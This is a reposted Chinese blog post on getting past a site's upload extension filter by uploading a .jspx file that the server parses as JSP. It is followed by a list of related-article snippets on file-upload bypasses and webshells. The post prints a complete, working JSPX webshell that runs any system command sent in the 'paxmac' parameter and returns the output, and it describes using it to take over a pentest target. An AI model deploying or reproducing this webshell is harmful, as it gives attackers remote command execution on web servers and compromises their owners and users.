上传JSPX文件绕过网站后缀名检查

最新推荐文章于 2025-06-11 11:10:52 发布
转载 最新推荐文章于 2025-06-11 11:10:52 发布 · 3.8k 阅读 · 0

这几天在做渗透测试的时候,发现一个有趣的东西。目标有上传漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上传文件,也不解析。后来只能放弃…

今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。 qingshen大牛,直接把配置的截图发过来,瞅了下,果然是类似iis解析cer、asa这类文件,作为一个jsp的映射。后来去网上找有没有 jspx的马,结果是没有找到的说,后来无才大牛丢了一个过来,上传,解析,搞定目标。呱呱…

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
    <jsp:directive.page import="java.io.*"/>

    <html>
        <head>
            <title>jspx</title>
        </head>
        <body>
            <jsp:scriptlet>
               try {
		String cmd = request.getParameter("paxmac");
		if (cmd !=null){
			Process child = Runtime.getRuntime().exec(cmd);
			InputStream in = child.getInputStream();
			int c;
			while ((c = in.read()) != -1) {
			out.print((char)c);
			}
			in.close();
			try {
			child.waitFor();
			} catch (InterruptedException e) {
			e.printStackTrace();
		}
		}
		} catch (IOException e) {
		System.err.println(e);
		}
            </jsp:scriptlet>
        </body>
    </html>
</jsp:root>

原文转载自:http://blog.paxmac.org/?p=431

网络安全-jsp绕过
m0_68976043的博客
09-24 931
我们来看一下这个样本,它提交的一个参数是 StringBuilder,cmd,把我们执行结果转换成一个流放进InputStreamReader进行一个包装,把字节流转换成字符流,执行之后把结果放入stringBuilder.toString();而这个WebShell为什么可以绕过,正因为它加载的是一个字节码,没有任何关键词,所以我们来尝试进行一个执行,很明显咱们的一个命令执行已经生效了,并且权限相当大可以执行net user。运行一下看看相当于对这个类生成了一个字节码。也可以执行一个计算器。
jsp文件上传_原创 | 绕过后缀安全检查进行文件上传
weixin_39767645的博客
11-25 3564
点击上方蓝字 关注我吧引言文件上传是web中比较常见的业务,例如上传头像、简历等。当前也有很多开源工具包进行辅助实现,例如Apache Commons FileUpload、Jfinal cos等。但是若在开发过程中没有做好相关的安全防护,攻击者可以通过上传恶意脚本来获取系统权限。对上传文件后缀名进行白名单限制也是比较简单有效的方式。以下是实际业务中发现的一处绕过后缀安全检查进行文件...
文件上传jsp限定后缀名文件上传功能
01-15
文件,图片上传,限定后缀名文件上传功能
老技术新学:jsp文件jspx文件区别
最新发布
上班搞IT,下班搞ITF。
06-11 194
本文介绍了在Oracle数据库中查询表数量的几种SQL语句,包括:查询所有表数量、单表行数、当前用户所有表行数,以及全库表行数统计。同时提供了使用num_rows获取更准确行数的方法,需要先执行ANALYZE TABLE分析表。文章还提醒注意事项:大型库可能耗时、需要权限、分区表特殊处理等。这些SQL可根据实际需求调整使用,是Oracle数据库管理的基础查询操作。
jsp 后缀名
weixin_33708432的博客
05-01 225
怎么修  比如成.jj   什么配置?   如果是针对jsp文件,它的后最名是不可以随便更的,但是你可以通过servlet来实现自定义文件后缀名的假象。 如:你自己写的一个servlet &lt;servlet-mapping&gt; &lt;servlet-name&gt;yourservletname&lt;/servlet-name&gt; &lt;url-patte...
jsp文件上传_文件上传
weixin_39751453的博客
12-03 838
一、文件上传的目的——脚本文件文件上传的一共可造成三种危害,从低到高分别是,任意内容文件,html文件,脚本文件。任意内容文件任意内容文件指的是虽然文件后缀不可控,但是文件内容可控,比如我可以上传一个内容为的jpg文件。这种是未校验文件头和文件内容导致的,往往不被视为漏洞,使用它们通常需要其他漏洞结合利用,比如php cgi解析漏洞,文件包含漏洞,结合任意目录上传覆盖正常文件。html文...
文件上传漏洞-04】服务器端检测与绕过实例(包含MIME类型、后缀名文件内容)
m0_64378913的博客
05-31 2401
目录1 相关基础知识1.1 MIME类型检测概述1.1.1 概述1.1.2 文件格式1.1.3 检测与绕过1.2 后缀名检测概述1.3 文件内容检测概述1.3.1 简介1.3.2 图片马的制作方法2 实例操作环境及前期准备简历2.1 操作环境2.2 前期准备3 MIME类型检测与绕过实例4 文件后缀名检测与绕过实例5 文件内容检测与绕过实例6 总结 1 相关基础知识 1.1 MIME类型检测概述 1.1.1 概述 定义:MIME(Multipurpose Internet Mail
文件上传漏洞常用绕过方式
热门推荐
qq_62078839的博客
04-07 1万+
目录 文件上传漏洞原理 常用防御方式和常用防御方式的绕过 一、前端JS检测 二、MIME检测 三、白名单检测 %00截断 0x00截断 四、黑名单绕过 文件拓展名绕过 .htaccess文件绕过 .user.ini.绕过 apache解析漏洞 IIS解析漏洞 Nginx解析漏洞 widows系统文件命名规则的特殊利用 五、文件内容检测 ①文件头检测 ②shell检测 六、条件竞争 靶场实战 文件上传漏洞原理 由于网站在对文件上传功能中没...
上传绕过php文件为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1597
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
文件上传漏洞的利用与绕过技巧
qq_37019068的博客
10-12 3390
前言 文件上传漏洞大多出现在可以进行文件上传的地方,如用户头像上传,文档上传处等。该漏洞是一个危害十分大的漏洞,通过文件上传,攻击者可以上传webshell并进行getshell操作,从而获得系统shell,可执行任意命令。也为后续大型木马的上传,特权提升提供了一个良好的基础。 文件上传漏洞的一些场景 接下来针对文件上传漏洞的一些waf过滤的场景进行说明并进行绕过和利用。 场景一:前端js代码白名单判断.jpg|.png|.gif后缀 在该场景下,防御的姿势是通过js代码对上传文件后缀进行判断,如果不是.
文件上传漏洞、WebShell、防御及绕过利用、Web容器解析漏洞、编辑器上传漏洞
Hi~ 土拨鼠
12-29 2185
文章目录文件上传漏洞漏洞概述漏洞成因漏洞危害WebShell大马小马GetShell漏洞利用的条件PUT方法上传文件漏洞的防御、绕过和利用黑白名单策略安装upload-labs前端限制与绕过服务器端检测---MIME类型 文件上传漏洞 漏洞概述 文件上传是web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件上传脚本更新网站等。如果服务器配置不当或者没有进行足够的过滤,web 用户就可以上传任意文件,包括恶意脚本文件、exe程序等,这就造成了文件上传漏洞。 漏洞成因 一方面服务器配置不当会
上传后缀绕过
12-13
上传的限制不能上传某些的后缀,对于上传中各绕过的描述
jsp 不解析pre_JSP 异常处理
weixin_42388176的博客
01-27 287
JSP 异常处理当编写JSP程序的时候,程序员可能会遗漏一些BUG,这些BUG可能会出现在程序的任何地方。JSP代码中通常有以下几类异常:检查型异常:检查型异常就是一个典型的用户错误或者一个程序员无法预见的错误。举例来说,如果一个文件将要被打开,但是无法找到这个文件,则一个异常被抛出。这些异常不能在编译期被简单地忽略。运行时异常:一个运行时异常可能已经被程序员避免,这种异常在编译期将会被忽略。错误...
漏洞复现篇——文件上传之js绕过
爱国小白帽
02-13 1966
漏洞说明: Web应用系统虽然对用户上传文件进行了校验,但是校验是通过前端javascript代码完成的。由于恶意用户可以对前端javascript进行修或者是通过抓包软件篡上传文件,就会导致基于js的校验很容易被绕过。 实验环境: 火狐浏览器 PHPstudy Burp Suite抓包软件 upload-labs-master上传漏洞靶场 首先判断是否存在前端js绕过漏洞 按F1...
文件上传绕过的一次思路总结(两个上传点组合Getshell)
qax
06-21 3149
这是朋友的一个渗透测试的项目,有个上传的黑名单,我就试了一下,本文章是一遍测试一遍记录的,对于一些知识点总结的不全,只是提供了一个渗透中碰到上传的思路,文章无排版,是笔记的形式做记录。......
实战记一次文件上传绕过
web15085599741的博客
05-20 438
hello 大家好给大家介绍接口上传绕过,同事发来一个网站说有很多漏洞于是故事就由此拉开 (由于网站漏洞还未修复,敏感信息全打马赛克,仅提供绕过思路) 网站有登录界面,用同事发来的账号密码直接登录 进入后发现已经被打上xss 在照片这里发现了上传点 开始上传文件burp抓包,把后缀jsp试试 返回包提升无法上传jsp和html文件 我们把后缀jspx试试,发现返回200 网站这边提示格式不对,这难道是传说中的白名单吗? 下面这张截图不着急,我们看到img这个接口没,我们试下jspx会怎
Jsp挖掘(7)-JSP上传漏洞
thelostworld
05-11 3857
JSP上传漏洞 一、上传漏洞成因文件上传过程中,通常因为未校验上传文件后缀类型,导致用户可上传jsp等一些webshell文件。代码审计时可重点关注对上传文件类型是否有足够安全的校验,以及是否限制文件大小等。解决的方法:主要是限制文件后缀名的校验,还有限制文件的大小文件上传漏洞的攻击与防御方式https://www.jianshu.com/p/5ebba04829801.前端限制(文件类型的验证)主要是前端的文件名的检查这个一般很好的绕过1.burp suite 绕过,抓包后面再修文件的类型的后缀名2.
使用“\“绕过文件上传限制小技巧
Websec
05-27 962
参考文章:记一次 Tomcat 部署 WAR 包拦截绕过的深究 - 勿忘初心 - Ch1ng's Blog 1、使用Tomcat 处理会忽略 \ 的情况,javasec园长提到的是 org.apache.tomcat.util.http.parser.HttpParser#unquote 方法会处理文件名中的 ",方法是见到双引号后直接字符串长度 -1,然后我们可以使用\去绕过文件上传后缀名检测限制,实现getshell。 2、成功绕过上传jsp文件 ...
记一次对上传jsp限制的绕过
weixin_34290390的博客
11-21 2322
当访问网站任何.jsp后缀文件时都会显示如下图所示或者session timeout等提示, 并且网站防护会,对上传大马和一句话会被查杀。 解决方法: 利用jspx包含,利用jspx包含图片或者css等可以绕过防护,demo_table_util.css是大马文件。 <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" ...
javaee资源文件后缀名
06-09
JavaEE 中的资源文件后缀名可以是不同的,具体使用哪种后缀名取决于文件的内容和用途。常见的 JavaEE 资源文件后缀名包括: - .properties:用于存储键值对的文件,通常被用于国际化和本地化。可以使用 Properties 类读取和写入该类型的文件。 - .xml:用于存储配置信息的文件,在 JavaEE 中使用广泛。可以使用 DOM 或 SAX 解析器读取和写入该类型的文件。 - .html/.jsp/.jspx:用于存储网页内容的文件,通常被用于 Web 应用程序。可以使用 JSP 或 Servlet 技术动态生成该类型的文件。 - .js/.css/.jpg/.png/.gif 等:用于存储脚本、样式表、图片等资源的文件,在 Web 应用程序中使用广泛。可以使用 HTML 或其他 Web 技术引用该类型的文件。 - .class/.jar/.war/.ear 等:用于存储 Java 代码和类库的文件,在 JavaEE 应用程序中使用广泛。可以使用 Java 虚拟机或其他 Java 技术加载和执行该类型的文件
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值